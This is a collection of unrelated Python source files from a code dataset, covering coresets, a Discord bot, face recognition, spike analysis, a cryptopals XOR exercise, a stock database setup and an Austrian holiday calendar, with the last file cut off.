self.secondary_attributes[node.value.attr].add(node.attr)\n else:\n for child in ast.iter_child_nodes(node):\n self.visit(child)\n\n def visit_Name(self, node: ast.Name):\n if node.id == self.arg_name:\n self.is_referenced = True\n print(f\"Referenced {node.id} in {node.lineno}:{node.col_offset}\")\n","sub_path":"labml/internal/configs/dependency_parser.py","file_name":"dependency_parser.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"129206857","text":"import numpy as np\nfrom .coreset import Coreset\nfrom ..util.errors import NumericalPrecisionError \n\nclass IterativeCoreset(Coreset):\n\n def __init__(self, **kw):\n super().__init__(**kw)\n self._itr = 0\n \n def reset(self):\n super().reset()\n self._itr = 0\n\n def _build(self, sz, itrs):\n itr_limit = self._itr + itrs\n retried_already = False\n while self._itr < itr_limit and (not self._terminate_on_size() or self.size() < sz):\n try:\n self._step(sz, self._itr)\n retried_already = False #refresh retried flag after a successful step\n self._itr += 1\n except NumericalPrecisionError as e: #a special error type for this library denoting possibly reaching numeric precision limit\n self.log.warning('numerical precision error: ' + str(e))\n if retried_already:\n self.log.warning('iterative step failed a second time. Assuming numeric limit reached.')\n self.reached_numeric_limit = True\n break\n else:\n self.log.warning('iterative step failed. Stabilizing and retrying...')\n retried_already = True\n self._stabilize()\n if self.reached_numeric_limit:\n break\n #done\n\n def _terminate_on_size(self):\n return True\n \n def _step(self, sz, itr):\n raise NotImplementedError()\n\n def _stabilize(self):\n pass #implementation optional; try to refresh cache/etc to make _step pass\n\n","sub_path":"bayesiancoresets/base/iterative.py","file_name":"iterative.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"607588660","text":"#!/usr/bin/env python3\n\nimport sys\n\ndef beststudent(filename):\n total = 0\n try:\n with open(filename) as f:\n for data in f:\n data = data.split()\n try:\n if int(data[0]) > total:\n total = int(data[0])\n name = \" \".join((data[1:]))\n except ValueError:\n print('Invalid mark {} encountered. Skipping.'.format(data[0]))\n print('Best student:', name)\n print('Best mark:', total)\n except FileNotFoundError:\n print('The file {} could not be opened.'.format(filename))\n\ndef main():\n filename = sys.argv[1]\n beststudent(filename)\n\nif __name__ == '__main__':\n main()\n","sub_path":"ca117/lab-022/beststudent_v3_022.py","file_name":"beststudent_v3_022.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"108468888","text":"#coding:utf-8\nfrom bs4 import BeautifulSoup\nimport requests\nimport os\nr = requests.get(\"http://m.699pic.com/tupian/chahua-so.html\")\n# print(r.content)\nsoup = BeautifulSoup(r.content,\"html.parser\")\n# print(soup)\nimages = soup.find_all(class_=\"lazy\")\n# print(images)\npath = \"D:\\\\Testing tools\\\\muke\\AutoTest\\\\auto_python\\\\bs4\\\\images\\\\\"\nfor i in images:\n try:\n url = i['src']\n name = i['alt']\n # print(url,name)\n ima = requests.get(url)\n \n with open(path+name+\".jpg\",\"wb\") as f:\n f.write(ima.content)\n except Exception as msg:\n print(msg)\n \n\n","sub_path":"auto_python/bs4/zhuatu.py","file_name":"zhuatu.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"80835990","text":"# Function for nth Fibonacci number\n\ndef Fibonacci(n):\n if n == 0:\n return 0\n elif n == 1:\n return 1\n else:\n return Fibonacci(n - 1) + Fibonacci(n - 2)\n\n\nnum = int(input(\"enter a number between 0 and 30 :\\n\"))\n\nif num < 0 or num > 30:\n print(\"wrong entry\")\nelse:\n print(Fibonacci(num))\n\n\n\n\n\n\n#","sub_path":"fibnaocci_recursive.py","file_name":"fibnaocci_recursive.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"149901911","text":"\"\"\"\n\n Measure a gate trace with a linear sweep\n\n Author: Bart Limburg\n Version: 12/07/2017\n\"\"\"\nfrom imports.data import Data\nfrom imports.hp4156a import HP\nfrom imports.functions import sleep\n\ndef init():\n return HP(source=1, drain=2, gate=3, screen_refresh=False)\n\ndef start(instr,name, dev): # This function is run for every device from main.py.\n print(\"Measuring Gate trace (HP) of experiment %s at device %s\" % (name,dev))\n # configure the sweep\n\n data_IVg = Data(name='%s_IV_HP' % name, dev = dev,coordinates='Vg',values='Isd') #create the data file\n\n [v,i] = instr.sweep_triangle(v_min=-0.4,v_max=0.4,v_step=0.01,electrode='source')\n\n\n data_IVg.fill(v,i)\n data_IVg.plot()\n data_IVg.close()\n\n print(\"Measurement completed.\")\n\ndef end(instr, name):\n instr.zero()\n","sub_path":"experiments/HP_IV.py","file_name":"HP_IV.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"309563314","text":"import joblib\nfrom torch import nn\nimport torch\nfrom knock71 import NN\n\nif __name__ == \"__main__\":\n trainf_np = joblib.load('train_feature.pkl')\n train_x = torch.from_numpy(trainf_np)\n trainl_np = joblib.load('train_label.pkl')\n train_y = torch.from_numpy(trainl_np)\n\n model = NN(300, 256, 4) \n criterion = nn.CrossEntropyLoss()\n\n loss = criterion(model(train_x[:4].float()), train_y[:4])\n model.zero_grad()\n loss.backward()\n\n print('loss: ' + str(loss))\n print('gradient: \\n' + str(model.output.weight.grad))\n\n'''\nloss: tensor(2.9821, grad_fn=)\ngradient:\ntensor([[-0.9348, 0.3831, 1.1587, ..., 0.5627, -0.2966, 0.1505],\n [ 3.6555, -1.5159, -4.5666, ..., -2.2121, 1.1609, -0.6112],\n [-1.0458, 0.4359, 1.3220, ..., 0.6385, -0.3333, 0.1830],\n [-1.6749, 0.6969, 2.0859, ..., 1.0108, -0.5310, 0.2777]])\n'''","sub_path":"oryza/chapter08/knock72.py","file_name":"knock72.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"17763491","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # An example of a typical data pipeline in neuroscience\n\n# In[1]:\n\n\nimport numpy as np\nimport pylab as pl\n# get_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# ## 1) Loading and plotting the data\n\n# First, we have to load the data from a directory. This specific file contains voltage values as function of time. What is measured is the voltage value close to an electrically active cells, a brain cell, as a function of time. The data format is raw text and the sampling is done at 50 mus per voltage value\n\n# In[2]:\n\n\nVtrace = np.loadtxt('./data/john_experiment_0.dat')\ntbins = np.arange(0, 60, 0.00005) # 1 min recording with 50mu s sampling\n\n\n# In[3]:\n\n\npl.plot(tbins[0:100000], Vtrace[0:100000], label = 'V trace')\nthreshold = -40\npl.plot(tbins[0:100000], np.ones(100000)*threshold, '--r', label = 'Threshold')\npl.xlabel('Time (s)')\npl.ylabel('Voltage (mV)')\npl.legend()\n\n\n# The data shows a measurement of a voltage as function of time. In addition to a noisy baseline, there are sharp peaks visible. These so-called spikes constitute the fundamental unit of electrical activity of nerve cells. The rest of this notebook is concerned with the extraction and analysis of these spikes.\n\n# ## 2) Extracting spikes: the central object in the dataset\n\n# The simplest method to identify spikes in a dataset is thresholding the numbers, and identifying the timepoints where the voltage exceeded some threshold. Here is is set to -40, but this number can be found automatically, e.g. by setting it to -np.std(Vtrace).\n\n# In[4]:\n\n\nabove = (Vtrace < threshold)\nspikes = above[1:] < above[0:-1]\n\nspikeTimes = tbins[np.where(spikes)]\nspikeVoltages = Vtrace[np.where(spikes)]\n\npl.plot(tbins, Vtrace, spikeTimes, spikeVoltages, 'xr')\npl.xlim([2.985, 3.0])\npl.xlabel('Time (s)')\npl.ylabel('Voltage (mV)')\n\n\n# The plot shows a typical spike: a short biphasic voltage pulse about 2ms long.\n# \n# Now that the spiketimes [i.e. the times when a spike occured] have been saved, we can study some of their statistical properties.\n\n# ## 3) Spike time analysis\n\n# First, let's look at the inter-spike intervals, i.e. the distribution of waiting times between two of these events.\n\n# In[5]:\n\n\nISI = np.diff(spikeTimes)\nISIhist = pl.hist(ISI*1000, 30)\npl.xlabel('Time (ms)')\npl.ylabel('Frequency')\n\n\n# As final results of this pipeline, we fit a model to this distribution, and print the fit parameters. The model is a log-normal distribution, i.e. a fit with an Gaussian to the logairhtms of the interspike intervals.\n\n# In[6]:\n\n\nimport scipy.optimize as opt\nimport scipy as sc\n\ndef normpdf(x, mu, sd, denom):\n num = np.exp(-(x-mu)**2/(2*sd*sd))\n return num/denom\n\nprobabilities = ISIhist[0]/np.sum(ISIhist[0])\ndistance_between_spikes = ISIhist[1][:-1]\n\npopt, pcov = opt.curve_fit(normpdf, np.log(distance_between_spikes), probabilities)\nprint(popt)\n\n\n# In[7]:\n\n\ndata_fitted = normpdf(np.log(distance_between_spikes), *popt)\n\n\n# In[8]:\n\n\npl.plot(distance_between_spikes, probabilities,'o', label = 'data')\npl.plot(distance_between_spikes, data_fitted,'r-', label = 'Fit with log-normal distribution')\npl.xlabel('Time (ms)')\npl.ylabel('Frequency')\npl.legend()\n\n\n# This modelpipeline ends here. We have ingested the raw data, identified spikes, calculated the inter spike intervals, and fitted a model function to it. In the remaining exercise, we will translate this pipeline into one of the standard forms in neuroscience.\n\n# In[ ]:\n\n\n\n\n","sub_path":"problem_3/neuro_pipeline.py","file_name":"neuro_pipeline.py","file_ext":"py","file_size_in_byte":3470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"341779405","text":"# -*- coding: utf-8 -*-\nimport cv2\nimport numpy as np\ntry:\n from sklearn.externals import joblib\nexcept ImportError:\n import joblib\nfrom face_csv import get_csv_to_dic\n \n\ndef trimming_face_image(image, face, size=(40,40)):\n \"\"\"\n 画像から顔を切り取り,リサイズした画像を返す\n \"\"\"\n for x, y, w, h in face:\n # スライシングで顔の部分を切り取る\n face_image = image[y:y+h, x:x+w]\n # リサイズする \n face_image = cv2.resize(face_image, size)\n return face_image\n\ndef get_predicted(face_image, clsfile, IMAGE_SIZE=40, IMAGE_SIZE_Y=40, COLOR_BYTE=3):\n \"\"\"\n clsfileから分類機を読み込みface_imageを分類し予想結果を整数で返す\n \"\"\" \n # 学習済のファイルを読み込む\n loaded_cls = joblib.load(clsfile)\n # 学習モデルの形式に変換\n flat_face_image = face_image.reshape((-1, IMAGE_SIZE * IMAGE_SIZE_Y * COLOR_BYTE))\n # 誰の顔か予測する\n predicted = loaded_cls.predict(flat_face_image)[0]\n return predicted\n\n\n# HaarLike特徴抽出アルゴリズムのパス\n# 任意のパス\nHAAR_FILE = \"haarcascade_frontalface_alt.xml\"\n# 学習した分類機のファイル\nclsfile = \"face_result_arasi.pkl\"\n\nIMAGE_SIZE = 40\nIMAGE_SIZE_Y = 40\nCOLOR_BYTE = 3\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\n\ncsv_file = \"train_data_arasi.csv\"\nname_dic = get_csv_to_dic(csv_file)\n\ncap = cv2.VideoCapture(0)\nwhile True: \n # 映像データを読み込んでサイズ変更\n rst, stream = cap.read()\n stream = cv2.resize(stream, (320,240))\n \n # HaarLike特徴抽出アルゴリズムから分類器を作成\n cascade = cv2.CascadeClassifier(HAAR_FILE)\n # 実際に分類を行う\n face = cascade.detectMultiScale(stream)\n\n # 認識したものが一つの時処理を行う\n if len(face) == 1:\n face_image = trimming_face_image(stream, face)\n predicted = get_predicted(face_image, clsfile)\n # 予測結果から名前を取得\n name_text = name_dic[str(predicted)]\n for x, y, w, h in face:\n # 認識した顔を赤い四角で囲う\n cv2.rectangle(stream, (x,y), (x+w,y+h), (0,0,255), 1)\n # 名前を表示\n cv2.putText(stream, name_text,(x,y-10), font, 1, (0,255,0), 3, cv2.LINE_AA)\n\n # 画像をウインドウに表示\n cv2.imshow(\"img\", stream)\n \n # 'q'を入力でアプリケーション終了\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n#終了処理\ncap.release()\ncv2.destroyAllWindows()","sub_path":"face_clf_40.py","file_name":"face_clf_40.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"342866016","text":"import templateflow.api as tf\nfrom ...utils import transforms\n\nrelpath = './esfmri_connectivity/parcellation/amygdala/'\n\ntransform = tf.get(template='MNI152NLin2009cAsym', suffix='xfm', extension='h5')\nreference = tf.get(template='MNI152NLin2009cAsym', suffix='T1w', resolution=1, desc='brain', extension='nii.gz')\n\n#img path\nimgs = ['tpl-MNI152NLin6Asym_res-01_atlas-3roiamygdala_dseg.nii.gz']\nout_imgs = ['tpl-MNI152NLin2009cAsym_res-01_atlas-3roiamygdala_dseg.nii.gz']\n\nfor n, i in enumerate(imgs):\n transforms.antstransform(relpath, i, reference, transform, out_imgs[n])\n\n","sub_path":"esfmri_connectivity/parcellation/amygdala/reref_mniNLin6_to_mni2009c.py","file_name":"reref_mniNLin6_to_mni2009c.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"559672555","text":"from discord.ext import commands\nimport discord\nimport traceback\nimport json\n\ndescription = '''\nThis is a bot made by CircuitRCAY (ser-ket-ar-cee-ay-why). Also known as me as a bot being useful (for once in my life)\n'''\n\n# this specifies what extensions to load when the bot starts up\nstartup_extensions = [\"cogs.members\", \"cogs.rng\", \"cogs.other\"]\n\n# Config\njson_file='cfg.json'\njson_data=open(json_file)\ndata = json.load(json_data)\n\nbot = commands.Bot(command_prefix=data[\"CMD_Prefix\"], description=description)\n\n@bot.event\nasync def on_ready():\n print('Logged in as: ' + bot.user.name + \" - \" + bot.user.id)\n print('Prefix: ' + bot.command_prefix)\n \n\nif __name__ == \"__main__\":\n for extension in startup_extensions:\n try:\n bot.load_extension(extension)\n except Exception as e:\n exc = '{}: {}'.format(type(e).__name__, e)\n print('Failed to load extension {}\\n{}'.format(extension, exc))\n\n\n\n\nbot.run(data['botToken'])\njson_data.close()\n\n\n\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"219979572","text":"def xor (x, y):\n\tz = bytearray(len(x))\n\tfor i in range(len(x)):\n\t\tz[i] = x[i] ^ y[i]\n\treturn z\n\ndef score(s):\n freq = {}\n freq[' '] = 700000000\n freq['e'] = 390395169\n freq['t'] = 282039486\n freq['a'] = 248362256\n freq['o'] = 235661502\n freq['i'] = 214822972\n freq['n'] = 214319386\n freq['s'] = 196844692\n freq['h'] = 193607737\n freq['r'] = 184990759\n freq['d'] = 134044565\n freq['l'] = 125951672\n freq['u'] = 88219598\n freq['c'] = 79962026\n freq['m'] = 79502870\n freq['f'] = 72967175\n freq['w'] = 69069021\n freq['g'] = 61549736\n freq['y'] = 59010696\n freq['p'] = 55746578\n freq['b'] = 47673928\n freq['v'] = 30476191\n freq['k'] = 22969448\n freq['x'] = 5574077\n freq['j'] = 4507165\n freq['q'] = 3649838\n freq['z'] = 2456495\n score = 0\n for c in s.lower():\n if c in freq:\n score += freq[c]\n return score\n\ndef break_single_key_xor(b1):\n max_score = None\n english_plaintext = None\n key = None\n\n for i in range(256):\n b2 = [i] * len(b1)\n plaintext = bytes(xor(b1, b2))\n pscore = score(plaintext)\n\n if pscore > max_score or not max_score:\n max_score = pscore\n english_plaintext = plaintext\n key = chr(i)\n return key, english_plaintext\n\ndef hamming_distance(enc_str1, enc_str2):\n differing_bits = 0\n for byte in xor(enc_str1, enc_str2):\n differing_bits += bin(byte).count(\"1\")\n return differing_bits\n\nbuf_dist_norm_min = 100\npossible_KEYSIZE = 0\nfile = open(\"6.txt\", \"r\").read()\nfile_decoded = bytearray(file.decode(\"base64\"))\n\nnormalized_distances = []\nfor KEYSIZE in range(2, 40):\n\n\tbuf1 = file_decoded[: KEYSIZE]\n\tbuf2 = file_decoded[KEYSIZE: KEYSIZE * 2]\n\tbuf3 = file_decoded[KEYSIZE * 2: KEYSIZE * 3]\n\tbuf4 = file_decoded[KEYSIZE * 3: KEYSIZE * 4]\n\n\tnormalized_distance = float(\n\t\thamming_distance(buf1, buf2) +\n\t\thamming_distance(buf2, buf3) +\n\t\thamming_distance(buf3, buf4) ) / (KEYSIZE * 3)\n\n\tnormalized_distances.append(\n\t\t(normalized_distance, KEYSIZE)\n\t\t)\n\nnormalized_distances.sort()\n#print(normalized_distances)\n\nkeysize = 29\nmax_score = 0\ntext = \"\"\nchar = 0\n\nkeysize_blocks = []\nfor i in range(len(file_decoded) / keysize):\n\tkeysize_blocks.append(file_decoded[i * keysize: (i + 1) * keysize])\n\ntransposed_blocks = zip(*keysize_blocks)\nkeys = \"\"\n\nfor bbytes in transposed_blocks:\n\tkeys += break_single_key_xor(bbytes)[0]\n\nkey = bytearray(keys * len(file_decoded))\nplaintext = bytes(xor(file_decoded, key))\n\n#print keys\n#print key \n#print plaintext\t\n\n","sub_path":"CTFs/CryptoPals/Set1/challenge6.py","file_name":"challenge6.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"540152570","text":"#coding:utf-8\r\n__author__ = 'cbb'\r\n\r\nimport platform, os\r\nfrom sqlalchemy import create_engine\r\nfrom util.MyLogger import Logger\r\nimport pymysql\r\nimport datetime\r\nimport sys\r\nreload(sys)\r\nsys.setdefaultencoding(\"utf-8\")\r\n\r\n#DB_WAY:数据存储方式 'csv' # or 'mysql' or 'redis' or 'sqlite'\r\nDB_WAY = 'mysql'\r\nDB_USER = 'root'\r\nDB_PWD = 'root' # or '123456' in win7\r\nDB_NAME = 'stock'\r\nDownloadDir = os.path.pardir + '/stockdata/' # os.path.pardir: 上级目录\r\n\r\n# mysql Host\r\n# if platform.system() == 'Windows':\r\n# host_mysql = 'localhost'\r\n# else:\r\n# host_mysql = '101.200.183.216'\r\nhost_mysql = 'localhost'\r\nuser_mysql = 'root'\r\npwd_mysql = '133499'\r\ndb_name_mysql = 'wealth_db'\r\n\r\n#engine = create_engine('mysql+mysqldb://%s:%s@%s/%s' % (user_mysql, pwd_mysql, host_mysql, db_name_mysql), connect_args={'charset':'utf8'})\r\nclass get_mysql(object):\r\n '''链接数据库,并根据提供的数据库名称和关键词信息创建一个表格,表格存在就不创建'''\r\n def __init__(self,dbname,key,citys):\r\n self.T = datetime.datetime.strftime(datetime.datetime.now(), \"%Y%m%d%H%M\")\r\n self.dbname = dbname\r\n self.key = key\r\n if len(citys) == 1:\r\n self.city = citys[0]\r\n elif len(citys) > 1:\r\n self.city = \"&\".join(citys)\r\n else:\r\n self.city = \"\"\r\n self.table_name = \"{}_{}_{}\".format(self.T,self.key,self.city)\r\n self.conn = pymysql.Connect(\r\n host=\"localhost\",\r\n port=3306,\r\n user='root',\r\n password='133499',\r\n db=self.dbname,\r\n charset='utf8'\r\n )\r\n self.cursor = self.conn.cursor()\r\n # 直接创建一个表格\r\n self.create_table()\r\n\r\n # 创建表格的函数,表格名称按照时间和关键词命名\r\n def create_table(self):\r\n sql = '''CREATE TABLE `{tbname}`(\r\n {job_name} varchar(100) not null,\r\n {gs_name} varchar(100),\r\n {salary} char(20),\r\n {job_site} char(20),\r\n {create_date} char(20),\r\n {job_link} varchar(100),\r\n {gs_link} varchar(100)\r\n )'''\r\n try:\r\n self.cursor.execute(sql.format(tbname=self.table_name,job_name=\"职位名称\",gs_name=\"公司名称\",salary=\"薪资\",\r\n job_site=\"工作地点\",create_date=\"发布时间\",job_link=\"招聘链接\",gs_link=\"公司链接\"))\r\n except Exception as e:\r\n print(\"创建表格失败,表格可能已经存在!\",e)\r\n else:\r\n self.conn.commit()\r\n print(\"成功创建一个表格,名称是{}\".format(self.table_name))\r\n\r\n # 插入信息函数,每次插入一条信息,插入信息失败会回滚\r\n def insert_data(self,data):\r\n '''插入数据,不成功就回滚操作'''\r\n sql = '''INSERT INTO `{}` VALUES('{}','{}','{}','{}','{}','{}','{}')'''\r\n try:\r\n self.cursor.execute(sql.format(self.table_name,data[\"job_name\"],data[\"gs_name\"],data[\"salary\"],data[\"job_site\"],\r\n data[\"create_date\"],data[\"job_link\"],data[\"gs_link\"]))\r\n except Exception as e:\r\n self.conn.rollback()\r\n print(\"插入信息失败,原因:\",e)\r\n else:\r\n self.conn.commit()\r\n print(\"成功插入一条信息\")\r\n\r\n def close_mytable(self):\r\n '''关闭游标和断开链接,数据全部插入后必须执行这个操作'''\r\n self.cursor.close()\r\n self.conn.close()\r\n\r\n# 短均线, 长均线\r\nAVR_SHORT = 12\r\nAVR_LONG = 40\r\n\r\n#买卖标记\r\nSIGNAL_BUY = 1 #买\r\nSIGNAL_SALE = -1 #卖\r\nSIGNAL_DEFAULT = 0\r\n\r\n#阈值\r\nThreshold_Buy_Count = 3\r\nThreshold_Sale_Count = 2\r\n\r\n#日志设置\r\nfrom util.MyLogger import Logger\r\ninfoLogger = Logger(logname='../Log/info.log', logger='I')\r\nerrorLogger = Logger(logname='../Log/error.log', logger='E')\r\n\r\n#配置文件 位置\r\nconfig_file_path = '../config.ini'\r\n","sub_path":"init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"86385322","text":"# -*- coding: utf-8 -*-\n# Copyright (C) 2003-2016 Mag. Christian Tanzer. All rights reserved\n# Glasauergasse 32, A--1130 Wien, Austria. tanzer@swing.co.at\n# ****************************************************************************\n#\n# This module is licensed under the terms of the BSD 3-Clause License\n# .\n# ****************************************************************************\n#\n#++\n# Name\n# CAL.Holiday\n#\n# Purpose\n# Provide information about fixed and moving Austrian holidays\n#\n# Revision Dates\n# 20-Apr-2003 (CT) Creation\n# 6-Feb-2004 (CT) Use (y, m, d) tuples instead of strings as dictionary\n# keys\n# 9-Feb-2004 (CT) Dependency on `Y.map` removed\n# 5-Jun-2004 (CT) `easter_date` implementation using Spencer Jones'\n# algorithm added\n# 10-Oct-2004 (MG) Use new `CAL.Date_Time` module instead of `Date_Time`\n# 15-Oct-2004 (CT) Use `CAL.Date` instead of `CAL.Date_Time`\n# 15-Oct-2004 (CT) `_main` and `_command_spec` added\n# 17-Oct-2004 (CT) Use `Date_Delta` instead of `Delta`\n# 31-Oct-2004 (CT) `_main` changed to display date, too\n# 5-Nov-2004 (CT) Use `//` for int division\n# 16-Jun-2010 (CT) Use unicode for holiday names\n# 16-Jun-2013 (CT) Use `TFL.CAO`, not `TFL.Command_Line`\n# 29-Jan-2016 (CT) Modernize, DRY\n# 1-Feb-2016 (CT) Add country dependent holidays; remove obsolete code\n# 2-Feb-2016 (CT) Factor `CAL.Day_Rule`\n# 2-Feb-2016 (CT) Add I18N, german and swiss holidays\n# 11-Feb-2016 (CT) Factor `TFL.I18N.test_language`\n# ««revision-date»»···\n#--\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom _CAL import CAL\nfrom _TFL import TFL\nfrom _TFL.pyk import pyk\n\nfrom _TFL.I18N import _, _T, _Tn\n\nimport _CAL.Date\nimport _CAL.Day_Rule\nimport _CAL.Delta\n\nimport _TFL.CAO\nimport _TFL._Meta.Object\nimport _TFL._Meta.Once_Property\n\nclass Holidays (CAL.Day_Rule.Set) :\n\n F = CAL.Day_Rule.Fixed\n E = CAL.Day_Rule.Easter_Dependent\n\n ### https://en.wikipedia.org/wiki/List_of_holidays_by_country\n _rules = \\\n ( F (_ (\"New Year's Day\"), 1, 1)\n , F (_ (\"Epiphany\"), 1, 6, \"AT\")\n , F (_ (\"Martin Luther King Day\")\n , 1, 1, \"US\", delta = dict (weekday = F.RD.MO (3))\n )\n , F (_ (\"Inauguration Day\")\n , 1, 20, \"US\", y_filter = lambda y : (y % 4 == 1)\n )\n , F (_ (\"Washington's Birthday\")\n , 2, 1, \"US\", delta = dict (weekday = F.RD.MO (3))\n )\n , F (_ (\"Saint Patrick's Day\"), 3, 17, \"IE\")\n , F (_ (\"Labor Day\"), 5, 1, \"AT\", \"DE\")\n , F (_ (\"May Day Bank Holiday\")\n , 5, 1, \"UK\", delta = dict (weekday = F.RD.MO (1))\n )\n , F (_ (\"May Day\")\n , 5, 1, \"IE\"\n , delta = dict (weekday = F.RD.MO (1))\n , y_filter = lambda y : y >= 1994\n )\n , F (_ (\"Spring Bank Holiday\")\n , 5, 31, \"UK\", delta = dict (weekday = F.RD.MO (-1))\n )\n , F (_ (\"Memorial Day\")\n , 5, 31, \"US\", delta = dict (weekday = F.RD.MO (-1))\n )\n , F (_ (\"June Holiday\")\n , 6, 1, \"IE\", delta = dict (weekday = F.RD.MO (1))\n )\n , F (_ (\"Independence Day\"), 7, 4, \"US\")\n , F (_ (\"Swiss National Day\"), 8, 1, \"CH\")\n , F (_ (\"August Holiday\")\n , 8, 1, \"IE\", delta = dict (weekday = F.RD.MO (1))\n )\n , F (_ (\"Assumption Day\"), 8, 15, \"AT\")\n , F (_ (\"Late Summer Bank Holiday\")\n , 8, 31, \"UK\", delta = dict (weekday = F.RD.MO (-1))\n )\n , F (_ (\"Labor Day\")\n , 9, 1, \"US\", delta = dict (weekday = F.RD.MO (1))\n )\n , F (_ (\"Federal Day of Thanksgiving, Repentance and Prayer\")\n , 9, 1, \"CH\", delta = dict (weekday = F.RD.SU (3))\n )\n , F (_ (\"German Unity Day\"), 10, 3, \"DE\"\n , y_filter = lambda y : y >= 1990\n )\n , F (_ (\"Columbus Day\")\n , 10, 1, \"US\", delta = dict (weekday = F.RD.MO (2))\n )\n , F (_ (\"Austrian National Day\"), 10, 26, \"AT\")\n , F (_ (\"October Holiday\")\n , 10, 31, \"IE\", delta = dict (weekday = F.RD.MO (-1))\n )\n , F (_ (\"All Saints' Day\"), 11, 1, \"AT\")\n , F (_ (\"Veterans Day\"), 11, 11, \"US\")\n , F (_ (\"Thanksgiving\")\n , 11, 1, \"US\", delta = dict (weekday = F.RD.TH (4))\n )\n , F (_ (\"Feast of the Immaculate Conception\"), 12, 8, \"AT\")\n , F (_ (\"Christmas Day\"), 12, 25, \"AT\", \"CH\", \"DE\", \"IE\", \"UK\", \"US\")\n , F (_ (\"St. Stephen's Day\"), 12, 26, \"AT\", \"CH\", \"DE\", \"IE\")\n , F (_ (\"Boxing Day\"), 12, 26, \"UK\")\n # easter dependent movable holidays\n , E (_ (\"Good Friday\"), -2, \"CH\", \"DE\", \"UK\")\n , E (_ (\"Easter Sunday\"), 0, \"AT\", \"CH\", \"DE\", \"UK\")\n , E (_ (\"Easter Monday\"), 1, \"AT\", \"CH\", \"DE\", \"IE\", \"UK\")\n , E (_ (\"Ascension Day\"), 39, \"AT\", \"CH\", \"DE\")\n , E (_ (\"Whit Sunday\"), 49, \"AT\", \"CH\", \"DE\")\n , E (_ (\"Whit Monday\"), 50, \"AT\", \"CH\", \"DE\")\n , E (_ (\"Corpus Christi\"), 60, \"AT\")\n )\n\n# end class Holidays\n\nholidays = Holidays ()\n\ndef _show (year, country, lang = \"de\") :\n \"\"\"\n >>> _show (2016, \"AT\")\n 1 2016/01/01 Neujahr\n 6 2016/01/06 Hl. Drei Könige\n 87 2016/03/27 Ostersonntag\n 88 2016/03/28 Ostermontag\n 122 2016/05/01 Tag der Arbeit\n 126 2016/05/05 Christi Himmelfahrt\n 136 2016/05/15 Pfingstsonntag\n 137 2016/05/16 Pfingstmontag\n 147 2016/05/26 Fronleichnam\n 228 2016/08/15 Mariä Himmelfahrt\n 300 2016/10/26 Nationalfeiertag\n 306 2016/11/01 Allerheiligen\n 343 2016/12/08 Mariä Empfängnis\n 360 2016/12/25 1. Weihnachtstag\n 361 2016/12/26 2. Weihnachtstag\n\n >>> _show (2016, \"DE\")\n 1 2016/01/01 Neujahr\n 85 2016/03/25 Karfreitag\n 87 2016/03/27 Ostersonntag\n 88 2016/03/28 Ostermontag\n 122 2016/05/01 Tag der Arbeit\n 126 2016/05/05 Christi Himmelfahrt\n 136 2016/05/15 Pfingstsonntag\n 137 2016/05/16 Pfingstmontag\n 277 2016/10/03 Tag der Deutschen Einheit\n 360 2016/12/25 1. Weihnachtstag\n 361 2016/12/26 2. Weihnachtstag\n\n >>> _show (2016, \"CH\", lang = \"en\")\n 1 2016/01/01 New Year's Day\n 85 2016/03/25 Good Friday\n 87 2016/03/27 Easter Sunday\n 88 2016/03/28 Easter Monday\n 126 2016/05/05 Ascension Day\n 136 2016/05/15 Whit Sunday\n 137 2016/05/16 Whit Monday\n 214 2016/08/01 Swiss National Day\n 262 2016/09/18 Federal Day of Thanksgiving, Repentance and Prayer\n 360 2016/12/25 Christmas Day\n 361 2016/12/26 St. Stephen's Day\n\n >>> _show (2016, \"IE\")\n 1 2016/01/01 Neujahr\n 77 2016/03/17 Saint Patrick's Day\n 88 2016/03/28 Ostermontag\n 123 2016/05/02 Mai-Feiertag\n 158 2016/06/06 Juni-Feiertag\n 214 2016/08/01 August-Feiertag\n 305 2016/10/31 Oktober-Feiertag\n 360 2016/12/25 1. Weihnachtstag\n 361 2016/12/26 2. Weihnachtstag\n\n >>> _show (2016, \"UK\")\n 1 2016/01/01 Neujahr\n 85 2016/03/25 Karfreitag\n 87 2016/03/27 Ostersonntag\n 88 2016/03/28 Ostermontag\n 123 2016/05/02 Bankfeiertag\n 151 2016/05/30 Bankfeiertag\n 242 2016/08/29 Bankfeiertag\n 360 2016/12/25 1. Weihnachtstag\n 361 2016/12/26 2. Weihnachtstag\n\n >>> _show (2017, \"UK\", lang = 